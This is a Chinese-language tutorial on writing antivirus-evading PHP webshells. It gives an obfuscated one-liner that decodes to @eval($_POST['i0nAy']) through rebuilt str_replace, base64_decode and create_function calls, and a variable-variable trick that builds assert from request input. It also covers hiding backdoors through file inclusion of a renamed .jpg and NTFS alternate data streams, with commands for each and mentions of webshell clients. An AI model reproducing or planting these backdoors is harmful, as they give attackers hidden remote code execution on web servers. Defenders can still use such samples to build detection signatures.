免查杀木马编写的方法:
把木马创建成函数,运行时调用函数、在线加密、组合法、变量覆盖
1.把木马创建成函数,运行时调用函数。
<?php
$mt="JF9QT1N";
$ojj="QGV2YWwo";
$hsa="UWydpMGle";
$fnx="5BeSleleddKTs=";
$zk = str_replace("d","","sdtdrd_redpdldadcde");
$ef = $zk("z", "", "zbazsze64_zdzeczodze");
$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn");
$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx)));
$zvm();
?>
str_replace:参数:("需要匹配的字符","替换字符","需要匹配的对象")
$zk=str_replace("d","","sdtdrd_redpdldadcde")=str_replace // $zk=str_replace
$ef=str_replace("z", "", "zbazsze64_zdzeczodze")=base64_decode // $ef=base64_decode
$dva=str_replace("p","","pcprpepaptpe_fpupnpcptpipopn")=create_function //$dva=create_function
$ojj.$mt.$hsa.$fnx=QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=
str_replace(("le", "", "QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=")=QGV2YWwoJF9QT1NUWydpMG5BeSddKTs=
base64_decode("QGV2YWwoJF9QT1NUWydpMG5BeSddKTs=")=@eval($_POST['i0nAy']);
create_function('',@eval($_POST['i0nAy']);)
$zvm();
image.png
2.变量覆盖
<?php
$h='f';
$$h=$_REQUEST['x']; //$$h可以理解为先解析后边这个$h,然后在进行解析,最终解析成为$f
$d='CHECK';
$$d='ass';
$$d=$CHECK.'ert';
$CHECK($f);
?>
3.组合法
变量覆盖+在线加密
4.在线加密
2 后门分析
后门分析的方法:关键字定位(通过对代码进行分析)、网络通信(f12)、使用wsexplorer进行抓包。
1.webshell
webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。也可以成为网站后门。
抓取软件数据包的软件是wsexplorer.
webshell免杀的方法:
1.文件包含(可以将木马后缀改为jpg,写一个php代码包含这个jpg文件。)
2.通过ntfs交换数据流文件实现文件隐藏。(可以使用软件okfiugenn进行删除数据流文件。)
例子1. echo xxx >>test.txt :webshell.php (创建数据流文件,内容是保存到webshell.php中且隐藏。)
dir /r 查看数据流文件
例子2. notepad muma.php //使用记事本创建一句话木马
type muma.php >>test.txt:muma.php //创建新的交换流文件
数据流文件的访问方法:(不能直接被访问)
1.可以通过包含文件执行数据流文件,在使用菜刀(冰蝎,蚁剑)进行连接。
image.png
或者使用手工进行执行。
image.png
2.直接在注册表
网友评论